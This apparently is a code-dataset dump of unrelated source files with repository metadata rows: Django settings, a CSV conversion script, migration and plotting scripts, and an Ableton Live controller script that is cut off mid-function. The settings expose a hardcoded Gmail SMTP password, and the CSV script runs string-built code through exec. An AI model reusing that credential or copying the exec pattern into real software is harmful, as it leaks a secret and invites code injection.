'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
STATIC_DIR,
]
#SMPT MAIL Configuration
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST='smtp.gmail.com'
EMAIL_PORT= 587
EMAIL_HOST_USER='[email protected]'
EMAIL_HOST_PASSWORD='aanchal123'
EMAIL_USE_TLS= True
TIME_ZONE = 'Asia/Kolkata'
| [
"[email protected]"
] | |
951b4442cabf4902c2af0e3992ca32fab9d49964 | 3a8ea5e69d3925919bc4d206f0480c35438d68d3 | /data/saves/txt2csv.py | 664339af044d7696f08a77876caa82df60d15267 | [] | no_license | TrellixVulnTeam/GTC_3DYA | 88d3e14a9d00b2571d3a8e15b9869b7f8ed9b844 | 93de95288dda2399cbfa532b3f65db2a1eaefbe9 | refs/heads/master | 2023-03-19T06:27:26.022402 | 2017-11-23T10:02:35 | 2017-11-23T10:02:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,395 | py | #!/usr/bin/python3
import sys, os
os.system("rm csv.txt && touch csv.txt")
vars = ["objectX", "objectY", "targetPosY", "targetPosX", "targetMap", "currentMap", "animationDirection", \
"targetMapFile", "objectType"]
with open('csv.txt', 'a') as csv_file:
csv_file.write(str(vars).strip("[]").replace("'", "").replace(", ,", ", ")+'\n')
for i in range(0, len(vars)):
with open(vars[i], "r") as myfile:
exec(vars[i] + " = []")
data = myfile.readlines()
splitList = data[0].split(", ")
for j in range(0, len(splitList)):
exec(eval("vars[i]")+".append(splitList[j].rstrip())")
print(eval(vars[i]))
csv = []
for i in range(0, 1000):
for j, file in enumerate(vars):
with open(file) as text:
contents = text.read().split(", ")
try:
csv.append(contents[i].strip("\n")+ ', ')
with open('csv.txt', 'a') as csv_file:
if j == len(vars)-1:
csv_file.write(str(csv).strip("[]").replace("'", "").replace(", ,", ", ")[:-2])
else:
csv_file.write(str(csv).strip("[]").replace("'", "").replace(", ,", ", "))
csv[:] = []
if j == len(vars)-1:
csv_file.write("\n")
except IndexError:
sys.exit()
| [
"[email protected]"
] | |
12ff067d4d973ce3a8d98caa49dc939608131064 | fe27c88ce233ecf196a6e24c02d962562b19a55a | /Elements/header.py | cce01cd924e64906bf61c1448bd573c8d31e6111 | [
"MIT"
] | permissive | shreyas/swalpa | d13221342b386cdfd12e4ecf48c6bcb46a258502 | 200c23a04e0a6a63b805705c9af15cec708b895a | refs/heads/master | 2016-08-09T07:17:29.615007 | 2016-03-31T17:45:20 | 2016-03-31T17:45:20 | 55,145,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,337 | py | # Copyright (c) 2016 Shreyas Kulkarni ([email protected])
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from element import element
from utils.annotations import overrides
from navbar import navbar
class header(element):
@overrides(element)
def construct(self):
self.add_desired_parent_elements_chain(navbar) | [
"[email protected]"
] | |
d005c194336845c14e74887110e5e55f11382714 | c4e729edfb9b056b9aa111a31eebefe41f39ac46 | /cloudapi/missions/tasks/record.py | cdaa29e70197b7ab5078425b1145c8e0ecc396b8 | [] | no_license | sun3shines/web | 870a558538278ecb4a39e5d9cab4ba2ebb626ca3 | 9e6f83e6e793f86ecdf7202daae3903cc052f266 | refs/heads/master | 2021-01-18T23:49:48.722245 | 2016-07-02T10:25:24 | 2016-07-02T10:25:24 | 54,888,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | # -*- coding: utf-8 -*-
import json
from cloudapi.missions.tasks.task import Task
from cloudlib.urls.flask import strGetAtRecords,strGetOtRecords
class ObjectRecord(Task):
def __init__(self,atName,objPath):
self.atName = atName
self.objPath = objPath
def getUrl(self):
return strGetOtRecords
def getBody(self):
return json.dumps({'atName':self.atName,
'objPath':self.objPath})
class AccountRecord(Task):
def __init__(self,atName):
self.atName = atName
def getUrl(self):
return strGetAtRecords
def getBody(self):
return json.dumps({'atName':self.atName})
| [
"[email protected]"
] | |
f5af86d4e534bdc42ff4aaf9bb038cb6c056da23 | 546e6d8c3bb21695fc8794f8680444973e18bf2e | /posts/migrations/0007_remove_post_likes.py | 74af4ab9263e29aa1e4a57c2345028596d9cfd97 | [] | no_license | salma-osama/DataStructuresProject | e6af0f4da0d2a15ebc5d0c6ed1a9067402728bc5 | c2f7831e33984131e5969669af9cfd32e968f2de | refs/heads/master | 2020-03-15T05:29:01.502211 | 2018-05-03T17:52:25 | 2018-05-03T17:52:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | # Generated by Django 2.0.4 on 2018-04-27 20:17
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0006_post_likes'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='likes',
),
]
| [
"[email protected]"
] | |
6fe735561a196c9ca6cb3a620e6f19a9433db701 | fe2c39fd6161ab009bfa52f28a6a31e3592c1011 | /src/pytorch_LSTM/pode-apagar-colab-20000-epocas/plot_csv.py | c92f68dbedda7404e732acf4cb01b15e4011b6a6 | [] | no_license | patrickctrf/ic-2019-2020-rnn-6d | 39fc35a385f51da251f2a6aaf3d74d0911c8c028 | bd352a879374db8882411f172b782beb2ea891c0 | refs/heads/master | 2022-08-10T11:31:16.114058 | 2020-10-09T01:36:06 | 2020-10-09T01:36:06 | 220,062,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | # Load the Pandas libraries with alias 'pd'
import pandas as pd
# Read data from file 'filename.csv'
# (in the same directory that your python process is based)
# Control delimiters, rows, column names with read_csv (see later)
df = pd.read_csv("loss_log.csv")
# Preview the first 5 lines of the loaded data
print(df.head())
import matplotlib.pyplot as plt
plt.close()
# gca stands for 'get current axis'
ax = plt.gca()
df.plot(kind='line',x='epoch',y='training_loss',ax=ax)
df.plot(kind='line',x='epoch',y='val_loss', color='red', ax=ax)
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['training_loss', 'val_loss'], loc='upper right')
plt.savefig("losses.png", dpi=400)
plt.show()
plt.close()
| [
"[email protected]"
] | |
8c8b7cf18508ad3e36b7fdd730f3943cec554af2 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03474/s404356500.py | d4682971fa5faca714d2624ed46885f397b1c9bf | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | a,b = map(int,input().split())
s = input()
S = list(s)
c = 0
for i in S:
if i == "-":
c += 1
if c > 1:
print("No")
exit()
if s.isdecimal() is True:
print("No")
exit()
if len(s) != a + b + 1:
print("No")
exit()
if s[:a].isdecimal() is True and S[a] == "-":
print("Yes")
else:
print("No") | [
"[email protected]"
] | |
48164e05697f12162b12e8aff4514bae824c3d8f | bbebd95ce007baf3be20ca14fc8fe696c4c7dd96 | /L9 Python Scripts/AumTroll_b995_9/AumTroll.py | 83d5019532316b29608ed862930eaf065731e895 | [] | no_license | spiralune/monomodular | 70eeabcb5a9921b7bab30d8c5fd45ca237cde9c3 | 862bb02067c2fbc9816795904b2537a9b5e1c7b6 | refs/heads/master | 2020-12-11T04:06:25.390424 | 2014-07-09T19:45:41 | 2014-07-09T19:45:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66,373 | py | # by amounra 0513 : http://www.aumhaa.com
from __future__ import with_statement
import Live
import time
import math
import sys
""" _Framework files """
from _Framework.ButtonElement import ButtonElement # Class representing a button a the controller
from _Framework.ButtonMatrixElement import ButtonMatrixElement # Class representing a 2-dimensional set of buttons
from _Framework.ChannelStripComponent import ChannelStripComponent # Class attaching to the mixer of a given track
from _Framework.ClipSlotComponent import ClipSlotComponent # Class representing a ClipSlot within Live
from _Framework.CompoundComponent import CompoundComponent # Base class for classes encompasing other components to form complex components
from _Framework.ControlElement import ControlElement # Base class for all classes representing control elements on a controller
from _Framework.ControlSurface import ControlSurface # Central base class for scripts based on the new Framework
from _Framework.ControlSurfaceComponent import ControlSurfaceComponent # Base class for all classes encapsulating functions in Live
from _Framework.DeviceComponent import DeviceComponent # Class representing a device in Live
from _Framework.EncoderElement import EncoderElement # Class representing a continuous control on the controller
from _Framework.InputControlElement import * # Base class for all classes representing control elements on a controller
from _Framework.MixerComponent import MixerComponent # Class encompassing several channel strips to form a mixer
from _Framework.ModeSelectorComponent import ModeSelectorComponent # Class for switching between modes, handle several functions with few controls
from _Framework.NotifyingControlElement import NotifyingControlElement # Class representing control elements that can send values
from _Framework.SceneComponent import SceneComponent # Class representing a scene in Live
from _Framework.SessionComponent import SessionComponent # Class encompassing several scene to cover a defined section of Live's session
from _Framework.SessionZoomingComponent import SessionZoomingComponent # Class using a matrix of buttons to choose blocks of clips in the session
from _Framework.SliderElement import SliderElement # Class representing a slider on the controller
from _Framework.TrackEQComponent import TrackEQComponent # Class representing a track's EQ, it attaches to the last EQ device in the track
from _Framework.TrackFilterComponent import TrackFilterComponent # Class representing a track's filter, attaches to the last filter in the track
from _Framework.TransportComponent import TransportComponent # Class encapsulating all functions in Live's transport section
from _Framework.SubjectSlot import subject_slot, subject_slot_group
"""Imports from the Monomodular Framework"""
from _Mono_Framework.CodecEncoderElement import CodecEncoderElement
from _Mono_Framework.EncoderMatrixElement import EncoderMatrixElement
from _Mono_Framework.MonoChopperComponent import MonoChopperComponent
from _Mono_Framework.MonoBridgeElement import MonoBridgeElement
from _Mono_Framework.MonoButtonElement import MonoButtonElement
from _Mono_Framework.MonoEncoderElement import MonoEncoderElement
from _Mono_Framework.ResetSendsComponent import ResetSendsComponent
from _Mono_Framework.DeviceSelectorComponent import DeviceSelectorComponent
from _Mono_Framework.DetailViewControllerComponent import DetailViewControllerComponent
from _Mono_Framework.MonomodComponent import MonomodComponent
from _Mono_Framework.MonoDeviceComponent import MonoDeviceComponent
from _Mono_Framework.LiveUtils import *
"""Custom files, overrides, and files from other scripts"""
from CNTRLR_9.Cntrlr import Cntrlr
from ModDevices import *
from Map import *
from _Tools.re import *
switchxfader = (240, 00, 01, 97, 02, 15, 01, 247)
switchxfaderrgb = (240, 00, 01, 97, 07, 15, 01, 247)
assigncolors = (240, 00, 01, 97, 07, 34, 00, 07, 03, 06, 05, 01, 02, 04, 247)
assign_default_colors = (240, 00, 01, 97, 07, 34, 00, 07, 06, 05, 01, 04, 03, 02, 247)
check_model = (240, 126, 127, 6, 1, 247)
request_snapshot = (240, 0, 1, 97, 8, 7, 6, 247)
factoryreset = (240,0,1,97,8,6,247)
btn_channels = (240, 0, 1, 97, 8, 19, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, 0, 247);
enc_channels = (240, 0, 1, 97, 8, 20, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, 247);
SLOWENCODER = (240, 0, 1, 97, 8, 30, 69, 00, 247)
NORMALENCODER = (240, 0, 1, 97, 8, 30, 00, 00, 247)
FASTENCODER = (240, 0, 1, 97, 8, 30, 04, 00, 247)
ENDCODER_BANK_CONTROL = [['ModDevice_knob0', 'ModDevice_knob1', 'ModDevice_knob2', 'ModDevice_knob3'], ['ModDevice_knob4', 'ModDevice_knob5', 'ModDevice_knob6', 'ModDevice_knob7']]
ENDCODER_BANKS = {'NoDevice':[ENDCODER_BANK_CONTROL[int(bank>3)] + ['CustomParameter_'+str(index+(bank*24)) for index in range(8)] for bank in range(8)]}
ALT_DEVICE_BANKS = {'EndCoders':ENDCODER_BANKS}
INITIAL_SCROLLING_DELAY = 5
INTERVAL_SCROLLING_DELAY = 1
class LoopPedalButtonElement(EncoderElement):
def __init__(self, *a, **k):
self._last = 0
super(LoopPedalButtonElement, self).__init__(*a, **k)
def receive_value(self, value):
self._verify_value(value)
value = int(value > 120)*127
self._last_sent_message = None
if value != self._last:
self.notify_value(value)
self._last = value
if self._report_input:
is_input = True
self._report_value(value, is_input)
class LoopPedalExpressionElement(EncoderElement):
def __init__(self, script, *a, **k):
self._last = 0
self._script = script
super(LoopPedalExpressionElement, self).__init__(*a, **k)
def receive_value(self, value):
self._verify_value(value)
if (value > self._last and (value - self._last) < 10) or (value < self._last and (self._last - value) < 10):
self.notify_value(value)
self._last = value
if self._report_input:
is_input = True
self._report_value(value, is_input)
else:
orig_value = value
value += int((value - self._last) > 0)*5
self.notify_value(value)
self._script.schedule_message(1, self.update_value, [orig_value, value])
self._last = value
def update_value(self, values):
if values[1] is self._last:
self.receive_value(values[0])
class AumTrollDeviceSelectorComponent(DeviceSelectorComponent):
def __init__(self, *a, **k):
super(AumTrollDeviceSelectorComponent, self).__init__(*a, **k)
self.song().add_appointed_device_listener(self._device_listener)
def disconnect(self, *a, **k):
super(AumTrollDeviceSelectorComponent, self).disconnect()
if self.song().appointed_device_has_listener(self._device_listener):
self.song().remove_appointed_device_listener(self._device_listener)
def set_matrix(self, matrix):
buttons = []
if not matrix is None:
for button, address in matrix.iterbuttons():
#self._script.log_message('button: ' + str(button))
button.use_default_message()
button.set_enabled(True)
buttons.append(button)
self.set_mode_buttons(tuple(buttons))
def set_mode_buttons(self, buttons):
#assert(isinstance(buttons, tuple) or buttons is None)
if buttons == None:
buttons = []
for button in self._modes_buttons:
button.remove_value_listener(self._mode_value)
self._modes_buttons = []
for button in buttons:
if not button is None:
button.add_value_listener(self._mode_value, identify_sender=True)
self._modes_buttons.append(button)
self._number_of_modes = len(self._modes_buttons) + self._offset
self.update()
def update(self):
if self.is_enabled():
name = 'None'
dev = self.song().appointed_device
if hasattr(dev, 'name'):
name = dev.name
dev_type = dev.type
dev_class = dev.class_name
if self._modes_buttons:
for index in range(len(self._modes_buttons)):
if match('p' + str(index+1) + ' ', name) != None:
val = (dev_class in DEVICE_COLORS and DEVICE_COLORS[dev_class]) or (dev_type in DEVICE_COLORS and DEVICE_COLORS[dev_type])
self._modes_buttons[index].send_value(val, True)
else:
self._modes_buttons[index].send_value(0, True)
def _update_mode(self):
mode = self._modes_heap[-1][0]
assert(mode in range(self.number_of_modes()))
if self._mode_index != mode:
self._mode_index = mode
if self.is_enabled():
key = str('p' + str(self._mode_index + 1 + self._offset) + ' ')
preset = None
for track in self.song().tracks:
for device in self.enumerate_track_device(track):
if(match(key, str(device.name)) != None):
preset = device
break
for return_track in self.song().return_tracks:
for device in self.enumerate_track_device(return_track):
if(match(key, str(device.name)) != None):
preset = device
break
for device in self.enumerate_track_device(self.song().master_track):
if(match(key, str(device.name)) != None):
preset = device
break
if preset != None:
#self._script.log_message('preset found: ' + str(preset.name))
self._script.set_appointed_device(preset)
self.song().view.select_device(preset)
#self._last_preset = self._mode_index + self._offset
self.update()
def set_mode(self, mode):
self._clean_heap()
self._modes_heap = [(mode, None, None)]
self._update_mode()
def _device_listener(self, *a, **k):
if self.is_enabled():
self.update()
class AumTrollMonoDevice(MonoDeviceComponent):
def __init__(self, *a, **k):
super(AumTrollMonoDevice, self).__init__(*a, **k)
class AumTrollMonomodComponent(MonomodComponent):
def __init__(self, *a, **k):
super(AumTrollMonomodComponent, self).__init__(*a, **k)
self._alt_device_banks = MOD_TYPES
self._host_name = 'AumTroll'
"""for device in self._alt_device_banks.keys():
for Type in self._alt_device_banks[device].keys():
for bank in self._alt_device_banks[device][Type]:
self._script.log_message(bank)"""
def disconnect(self, *a, **k):
self._release_mod_dials()
super(AumTrollMonomodComponent, self).disconnect(*a, **k)
def connect_to_clients(self, *a, **k):
super(AumTrollMonomodComponent, self).connect_to_clients(*a, **k)
for index in range(4):
self._client[index]._mod_dial = (self._script._encoder[index]) #assign it a modDial so that we can control its modVolume from the unshifted CNTRLR
def _select_client(self, *a, **k):
super(AumTrollMonomodComponent, self)._select_client(*a, **k)
self._script.set_local_ring_control(self._active_client._c_local_ring_control)
self._script.set_absolute_mode(self._active_client._c_absolute_mode)
if not self._active_client._device_component == None:
self._active_client._device_component.update()
def _matrix_value(self, value, x, y, is_momentary): #to be sent to client from controller
assert (self._grid != None)
assert (value in range(128))
assert isinstance(is_momentary, type(False))
if (self.is_enabled()):
self._active_client._send_c_grid(x + self._x, y + self._y, value)
def _send_grid(self, *a):
pass
def _alt_value(self, value):
if self._shift_pressed == 0:
self._alt_pressed = value != 0
self._active_client._send('alt', int(self._alt_pressed))
self.update()
def _set_key_buttons(self, buttons):
#self._script.log_message('set key buttons ' + str(buttons))
assert (buttons == None) or (isinstance(buttons, tuple))
for key in self._keys:
if key.value_has_listener(self._key_value):
key.remove_value_listener(self._key_value)
self._keys = []
if buttons != None:
assert len(buttons) == 32
for button in buttons:
assert isinstance(button, MonoButtonElement)
self._keys.append(button)
button.add_value_listener(self._key_value, True)
def _key_value(self, value, sender):
if self.is_enabled():
self._active_client._send_c_key(self._keys.index(sender), int(value!=0))
def _update_keys(self):
for index in range(32):
self._send_c_key(index, self._active_client._c_key[index])
def _update_grid(self):
if self.is_enabled() and self._grid != None:
for column in range(self._grid.width()):
for row in range(self._grid.height()):
self._send_c_grid(column, row, self._active_client._c_grid[column][row])
def _send_key(self, *a):
pass
def _set_knobs(self, knobs):
assert (knobs == None) or (isinstance(knobs, tuple))
for knob in self._knobs:
if knob.has_value_listener(self._knob_value):
knob.remove_value_listener(self._knob_value)
self._knobs = []
if knobs != None:
assert len(knobs) == 24
for knob in knobs:
assert isinstance(knob, EncoderElement)
self._knobs.append(knob)
knob.add_value_listener(self._knob_value, True)
def _knob_value(self, value, sender):
if self.is_enabled():
self._active_client._send_c_knob(self._knobs.index(sender), value)
def on_enabled_changed(self, *a, **k):
super(AumTrollMonomodComponent, self).on_enabled_changed(*a, **k)
if self._active_client != None:
if self.is_enabled():
if not self._active_client._device_component is None:
self._active_client._device_component.update()
self._script.set_absolute_mode(self._active_client._c_absolute_mode)
self._script.set_local_ring_control(self._active_client._c_local_ring_control)
else:
for control in self._parameter_controls:
control.release_parameter()
self._script.set_absolute_mode(1)
self._script.set_local_ring_control(1)
def _dial_matrix_value(self, value, x, y):
if self.is_enabled() and self._active_client != None:
if self._script._absolute_mode == 0:
value = RELATIVE[int(value == 1)]
self._active_client._send_c_dial(x, y, value)
def _reset_encoder(self, coord):
self._dial_matrix.get_dial(coord[0], coord[1])._reset_to_center()
def _dial_button_matrix_value(self, value, x, y, force):
if (self.is_enabled()) and (self._active_client != None):
self._active_client._send_c_dial_button(x, y, value)
"""CNTRLR specific methods"""
def _send_c_grid(self, column, row, value): #to be sent to controller from client
if self.is_enabled() and self._grid != None:
if column in range(self._x, self._x + 4):
if row in range(self._y, self._y + 4):
self._grid.get_button(column - self._x, row - self._y).send_value(int(self._colors[value]))
def _send_c_key(self, index, value):
if self.is_enabled():
#if (self._shift_pressed > 0) or (self._locked > 0):
# self._grid.get_button(index, 7).send_value(int(self._colors[value]))
if self._keys != None and len(self._keys) > index:
self._keys[index].send_value(int(self._colors[value]))
def _send_c_wheel(self, column, row, wheel, parameter=None): #to be sent to controller from client
if self.is_enabled() and wheel != None:
if column < 4 and row < 3:
dial = self._dial_matrix.get_dial(column, row)
if(parameter=='value'):
dial._ring_value = int(wheel['value'])
dial._ring_mode = int(wheel['mode'])
dial._ring_green = int(wheel['green']!=0)
dial._ring_log = int(wheel['log'])
if(parameter=='custom'):
dial._ring_custom = dial._calculate_custom(str(wheel['custom']))
self._dial_button_matrix.send_value(column, row, wheel['white'])
if(self._script._absolute_mode > 0) and (not self._active_client._device_component.is_enabled()):
dial.send_value(wheel['log'], True)
def _update_c_wheel(self):
if self._dial_button_matrix != None:
for column in range(4):
for row in range(3):
self._send_c_wheel(column, row, self._active_client._c_wheel[column][row])
if not self._active_client._device_component.is_enabled():
self._send_to_lcd(column, row, self._active_client._c_wheel[column][row])
#self._script.log_message('dial value update' +str(column) + str(row) + str(self._active_client._wheel[column][row]['value']))
def _update_wheel(self):
self._update_c_wheel()
def set_c_local_ring_control(self, val = 1):
self._c_local_ring_control = (val!=0)
self._script.set_local_ring_control(self._c_local_ring_control)
def set_c_absolute_mode(self, val=1):
self._c_absolute_mode = (val!=0)
self._script.set_absolute_mode(self._c_absolute_mode)
def _release_mod_dials(self):
if not self._client is None:
for client in self._client: #for each of our 4 clients:
if not client._mod_dial == None: #if the client has a modDial assigned to it
#self._script.log_message('mod dial release ' + str(client))
client._mod_dial.release_parameter() #remove the modDial's parameter assignment
def _assign_mod_dials(self):
if not self._client is None:
for client in self._client: #recursion to contain all available clients
param = client._mod_dial_parameter() #param is a local variable, and we assign its value to the mod_dial_parameter (this is handled by each individual client module)
#self._script.log_message('mod dial param ' + str(param))
if not client._mod_dial == None: #if the client has been assigned a mod dial (which it should have been in setup_mod() )
if not param == None: #if the param variable was properly assigned in the client module
client._mod_dial.connect_to(param) #connect the physical control to the parameter (this should be the moddial parameter in the m4l patch)
else:
client._mod_dial.release_parameter() #if the param was None, release the physical control from any assignments
self._script.request_rebuild_midi_map()
def _display_mod_colors(self):
if not self._client is None:
for index in range(4): #set up a recursion of 4
self._script._shift_mode._modes_buttons[index].send_value(self._client[index]._mod_color) #update the modLEDs to display the color assigned to its contained mod
if self._is_enabled:
self._script._shift_mode._modes_buttons[self._client.index(self._active_client)].send_value(8)
else:
for index in range(4):
self._script._shift_mode._modes_buttons[index].send_value(0)
def _send_nav_box(self):
pass
class ShiftModeComponent(ModeSelectorComponent):
__module__ = __name__
__doc__ = ' Special Class that selects mode 0 if a mode button thats active is pressed'
def __init__(self, script, callback, *a, **k):
super(ShiftModeComponent, self).__init__(*a, **k)
self._script = script
self.update = callback
self._modes_buttons = []
self._last_mode = 0
self._set_protected_mode_index(0)
def set_mode_buttons(self, buttons):
for button in self._modes_buttons:
button.remove_value_listener(self._mode_value)
self._modes_buttons = []
if (buttons != None):
for button in buttons:
assert isinstance(button, ButtonElement or FlashingButtonElement)
identify_sender = True
button.add_value_listener(self._mode_value, identify_sender)
self._modes_buttons.append(button)
def number_of_modes(self):
return 5
def set_mode(self, mode):
assert isinstance(mode, int)
mode += 1
assert (mode in range(self.number_of_modes()))
if (self._mode_index != mode):
self._mode_index = mode
self.update()
elif (self._mode_index != 0):
self._mode_index = 0
self.update()
def _mode_value(self, value, sender):
assert (len(self._modes_buttons) > 0)
assert isinstance(value, int)
assert isinstance(sender, ButtonElement)
assert (self._modes_buttons.count(sender) == 1)
if ((value is not 0) or (not sender.is_momentary())):
self.set_mode(self._modes_buttons.index(sender))
class AumTrollDetailViewController(DetailViewControllerComponent):
def __init__(self, script, *a, **k):
super(AumTrollDetailViewController, self).__init__(*a, **k)
self._script = script
def _nav_value(self, value, sender):
super(AumTrollDetailViewController, self)._nav_value(value, sender)
if (self.is_enabled() and (not self._shift_pressed)):
if ((not sender.is_momentary()) or (value != 0)):
modifier_pressed = True
if not ((not self.application().view.is_view_visible('Detail')) or (not self.application().view.is_view_visible('Detail/DeviceChain'))):
self._script._update_selected_device()
class AumTroll(Cntrlr):
__module__ = __name__
__doc__ = " MonOhmod companion controller script "
def __init__(self, *a, **k):
self._monohm = None
self._aumpush = None
self._shifted = False
self._use_pedal = True
self._suppress_next_mod_display = False
self._monomod_version = 'b995'
self._codec_version = 'b995'
super(AumTroll, self).__init__(*a, **k)
"""these need to be moved into the _setup_mod() method of CNTRLR"""
self._client = None
self._active_client = None
self._host_name = "AumTroll"
with self.component_guard():
self._setup_alt_device_control()
self._setup_alt_mixer()
self._setup_pedal()
self._setup_device_selector()
#self._setup_alt_device_control()
#self.schedule_message(3, self._session._do_show_highlight)
self._send_midi(tuple(request_snapshot))
"""script initialization methods"""
def _open_log(self):
self.log_message("<<<<<<<<<<<<<<<<<<<<= " + str(self._host_name) + " " + str(self._monomod_version) + " log opened =>>>>>>>>>>>>>>>>>>>")
self.show_message(str(self._host_name) + ' Control Surface Loaded')
"""this section sets up the host environment that allows the controller to access different mods from the modButtons"""
def _setup_mod(self):
self._host = AumTrollMonomodComponent(self) #the MonomodComponent is the bridge between the CNTRLR's controls and the client patches that connect to m4l
self._host.name = 'Monomod_Host' #name it so we can access it
self.hosts = [self._host]
self._host._set_parameter_controls(self._encoder)
"""since there are many different configurations possible with the modButtons, we'll need to create a ModeSelectorComponent"""
"""to manage the different states of our controller"""
def _setup_modes(self):
self._shift_mode = ShiftModeComponent(self, self.shift_update) #here we call a new component by passing this module and its shift_update method
self._shift_mode.name = 'Mod_Mode' #name it so we can access it
self._shift_mode.set_mode_buttons([self._encoder_button[index] for index in range(4)]) #set the mode buttons that we will use to change states
self._monohm_shift = self._create_monohm_shift()
self._last_client = None
def _setup_switchboard(self):
pass
def _setup_device_selector(self):
self._device_selector = AumTrollDeviceSelectorComponent(self)
self._device_selector.name = 'Device_Selector'
"""cntrlr modes"""
"""here we set up some methods that will be used to update the control assignments when we change between different modes"""
"""this method is called everytime we change modes. If we make any assignments in the other mode assignment methods, we"""
"""have to be sure to remove them in this function. This creates a 'blank slate' for all the CNTRLRs control elements"""
def deassign_live_controls(self):
#for index in range(4):
# if self._encoder[index].value_has_listener(self._client[index]._mod_dial_value):
# self._encoder[index].remove_value_listener(self._client[index]._mod_dial_value)
#self.log_message('deassign live controls')
#self._device_selector.set_mode_buttons(None)
self._leds_last = None
self._device_selector.set_enabled(False)
self._device._parameter_controls = None
self._deassign_monomodular_controls()
self._device1._parameter_controls = None
self._device2._parameter_controls = None
for index in range(8):
self._mixer2.channel_strip(index).set_select_button(None)
self._mixer2.channel_strip(index).set_volume_control(None)
for index in range(4):
self._mixer3.channel_strip(index).set_select_button(None)
self._mixer3.channel_strip(index).set_volume_control(None)
self._mixer3.return_strip(index).set_volume_control(None)
if self._aumpush:
self._aumpush._host._set_bank_buttons(None)
self._on_shift_button_value.subject = None
self._mixer.set_crossfader_control(None)
"""THIS SECTION IS MISSING FROM THE ORIGINAL SCRIPT AND NEEDS TO BE FIXED...THE ASSIGNMENTS WERE MADE AT __init__"""
for index in range(4):
self._mixer.channel_strip(index).set_volume_control(None) #Since we gave our mixer 4 tracks above, we'll now assign our fader controls to it
for index in range(2):
self._mixer.return_strip(index).set_volume_control(None) #assign the right faders to control the volume of our return strips
self._mixer.master_strip().set_volume_control(None) #assign the far right fader to control our master channel strip
self._mixer.set_prehear_volume_control(None) #assign the remaining fader to control our prehear volume of the the master channel strip
for index in range(4): #for the left side of the mixer
self._mixer.channel_strip(index).set_solo_button(None) #remove the solo button assignments
self._mixer.channel_strip(index).set_arm_button(None) #remove the arm button assignments
self._mixer.channel_strip(index).set_mute_button(None) #remove the mute button assignments
self._mixer.channel_strip(index).set_select_button(None) #remove the select button assignments
for column in range(4):
for row in range(4):
self._scene[row].clip_slot(column).set_launch_button(None) #remove the clip launch assignments
self._send_reset.set_buttons(tuple([None for index in range(4)])) #remove the send_reset button assignments - this has to be sent as a tuple
self._session.set_stop_track_clip_buttons(None) #remove the clip_stop button assignments
self._session.set_track_bank_buttons(None, None) #set the track bank buttons for the Session navigation controls
self._session.set_scene_bank_buttons(None, None) #set the scnee bank buttons for the Session navigation controls
self._transport.set_play_button(None) #remove the play button assignment
self._transport.set_record_button(None) #remove the record button assignment
self._transport.set_stop_button(None) #remove the stop button assignment
for index in range(16):
self._grid[index].set_on_off_values(127, 0) #reset the on/off values of the grid buttons
self._grid[index].reset() #turn the buttons LEDs off
for index in range(32):
